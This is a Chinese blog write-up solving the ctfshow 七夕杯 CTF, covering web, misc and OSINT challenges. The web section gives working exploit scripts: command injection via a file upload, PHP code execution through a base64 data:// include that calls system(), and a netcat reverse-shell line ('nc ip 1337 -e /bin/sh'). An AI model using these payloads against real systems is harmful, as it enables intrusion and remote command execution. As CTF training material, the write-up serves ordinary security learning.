ctfshow 七夕杯

最新推荐文章于 2024-05-10 16:35:19 发布
最新推荐文章于 2024-05-10 16:35:19 发布
阅读量949 收藏
点赞数
文章标签: php 服务器 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blowed/article/details/126366999
版权

WEB签到 easy_calceasy_cmdMISC签到lsb海盗的密码OSINT

WEB

签到

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://48bb5eb8-ca0e-4a11-8438-4a06cf2f1471.challenge.ctf.show/"
​
​
def getShell(payload):
    data={
    "cmd":payload
    }
    file = {
    "file":b"#!/bin/sh\ncat /f*>/var/www/html/1.txt"
    }
    response = requests.post(url=url+"api/tools.php",files=file,data=data)
    if "t*" in response.text:
        print("执行成功,检查回显...")
    response = requests.get(url=url+"1.txt")
    if response.status_code == 200:
        print("flag 获取成功 "+response.text)
    else:
        print("flag 获取失败")
​
​
def run():
    getShell(". /t*/*")
​
def main():
    run()
    
if __name__ == '__main__':
    main()

easy_calc

官方wp写的很清楚 Docs

从题目代码来看,是输入3个值,分别是num1、符号值、num2

然后过滤了一大堆符号,这种就是最直接的提示,没过滤哪个,就用哪个

然后把3个值拼接起来进行执行

既然是eval就是代码执行,但是又不能用括号,那么只能用不用括号的函数了,那么答案很显然 ,php中不需要括号使用的函数,叫做语言结构,常见的有include、require、echo

使用include来执行代码,那么显而易见,肯定要用到伪协议

我们只需要构造出一个data的伪协议看看

正常的伪协议包含是这样的

include "data://text/plain,<?php phpinfo();?>"

但是<和()不能使用,所以需要编码 使用data协议的第二种写法

include "data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+"
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
url = "http://fc4f95dd-c44d-45ed-8557-c1a4fa9697e9.challenge.ctf.show/"
​
def getFlag():
        data={
            "num1":'include "data://text',
            "symbol":"/",
            "num2":'plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+";',
            "1":"system('cat /secret');"
        }
        response=requests.post(url=url,data=data)
        print(response.text)
​
if __name__ == '__main__':
        getFlag()
​

easy_cmd

nc ip 1337 -e /bin/sh

MISC

签到

 

lsb

看到颠倒了 ,用python倒回来

with open('zip','rb') as f:
    content=f.read()
with open('1.zip','wb') as w:
    w.write(content[::-1])
​

然后解压出来图片末尾有ctfshow 推测是密码

 

🌊☺🌪☂👣☃🚫🚹⏩🤣✅🎈☂👣⌨🌊😁🎤❓⌨🍎🎃😆🌊🌊🐎🎃👌☀🍎🍵🍵😀☀😂🍎❓☀🚰🔄👌🏎📂🔬🎤👑👑😇🗒🍴😁🚫🚫🌪😍⌨🐅💧🍴😇🏎😀🚨🚨

emoji-aes

key 为ctfshow 偏移量为2

 

海盗的密码

根据题目用ip地址做密码,百度索马里的ip地址爆破 索马里IP大全 索马里IP地址列表 索马里IP段下载 2022-08-15

一个个去尝试 其实也挺快的 主要是自己换掩码浪费时间

 

OSINT

直接百度搜图,点开各种链接 自己找

Fnylad
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1281
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP
ctfshow 七夕(复现)
as you know, nlp is fantasitc!
08-07 1584
最终执行命令的语句是 $num1$symbol$num2 拼接起来的,而且过滤()不能调用函数,所以根据语言结构是 include、require、echo这种语句,试着去包含文件。这个题可以理解为注入,在整个计算语句中注入我们想要执行的命令语句,只不过是过滤()之后不能调用函数执行。我开始这样做了,但是最后并没有做出来的原因是:我一直在网站根目录下看有没有生成文件,实际上这条命令执行在api这个目录下,生成的文件也在这个目录下,所以需要到/api这个目录下去寻找是否生成文件。,尝试别的地方,发现。...
ctfshow 新手 web
shinygod的博客
10-09 720
基础练习
Web】CTFSHOW 七夕 题解
最新发布
uuzeray的博客
05-10 395
一眼命令拼接,先fuzz一下可以用的字符。过滤了括号,不难想到用include。也可以打临时文件RCE。直接nginx日志包含。直接nc反弹shell。
ctfshow-web七夕
记录学习,一起进步
05-10 314
ctfshow-web七夕
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1374
BUUCTF [RoarCTF 2019]Easy Calc1 WP
ctfshow七夕web
m0_68074153的博客
08-06 2178
限制长度命令执行,php伪协议,反弹shell
qixi_love:七夕web动画演示
05-15
七夕Web动画演示——基于JavaScript的实现】 七夕,中国的传统情人节,是情侣们表达爱意的日子。在数字化时代,网页上的动画效果为庆祝这个节日增添了许多趣味性。"qixi_love"项目就是一个典型的例子,它利用...
七夕表白Chrome插件
07-28
七夕表白Chrome插件】是一款利用JavaScript技术打造的浪漫表达工具,专为七夕这一中国传统情人节设计。这款插件通过HTML、CSS和JavaScript的完美结合,为用户呈现出满屏的爱心效果,让爱意传递更为生动有趣。下面...
程序员七夕告白源码
08-16
精美的网页加上动听的音乐效果是程序员七夕告白的绝佳神器。里面包含了十三个源代码。第一个是计算你和另一半在一起的时间。只需要改动源码里面的起始时间就可以实现你想要的结果。怎么改动起始时间和怎么将音乐改成...
浪漫七夕柔情似水PPT模板
11-19
这是整理发布的一款浪漫七夕柔情似水PPT模板,PPT适合七夕情人节情侣表白使用,有需要的小伙伴快下载使用吧!该文档为浪漫七夕柔情似水PPT模板,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以下载看看
七夕节主题活动策划ppt模板
11-19
这是整理发布的一款七夕节主题活动策划ppt模板,PPT适合七夕情人节活动策划使用,有需要的小伙伴快下载使用吧!该文档为七夕节主题活动策划ppt模板,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以下载看...
ctfshow七夕复现
qq_63928796的博客
08-08 778
得到一个ctfshow,题目说是lsb,猜测是lsb加密隐写,ctfshow为key解密得到。既然是eval就是代码执行,但是又不能用括号,那么只能用不用括号的函数了,那么答案很显然。那么思路有了,要使用include来执行代码,那么显而易见,肯定要用到。然后过滤了一大堆符号,这种就是最直接的提示,没过滤哪个,就用哪个。从题目代码来看,是输入3个值,分别是num1、符合值、num2。但是呢,题目不能用括号和< 随意需要对执行的代码进行编码。得到一个没有后缀的文件,放到010查看。正常的伪协议包含是这样的。.
web随笔记录二
nareku的博客
09-14 652
浅浅记录
做题记录命令执行buuctfEasy Calc
zbbjya的博客
03-25 3598
题目Easy Calc 查看源代码 给提示url 还有 waf绕过 发现过滤了许多东西 查看根目录发现了flag然后我们将 用 file_get_contents() 函数先读取文件为字符串然后用 var_dump 显示字符串得到 flag 构造playload然后得到flag 题目总结 首先我们要发现是题目给的提示,当查看源代码的时候好好的去看,然后我们看到有一个waf绕过, 在不知道的情况下我们要去了解一下什么是waf绕过 然后打开php文件查看源码时命令执行的一种方式我们 根据提示开始分析看题目的
ctfshow愚人 re easy_pyc wp
Altering_Ji的博客
04-02 825
ctfshow平台2023愚人re题easy_pyc的wp
ctfshow七夕web签到wp
arcuied
12-29 303
ctfshow七夕web签到wp
CTFshow - 七夕复现
Pai_Space
10-24 739
CTFshow 七夕
ctfshow七夕2022
Pysnow's Blog
08-06 1147
https://pysnow.cn/archives/281/
ctfshow Lucky7
08-31
- *1* *2* *3* [ctfshow七夕2022(re)](https://blog.csdn.net/weixin_49764009/article/details/126217140)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值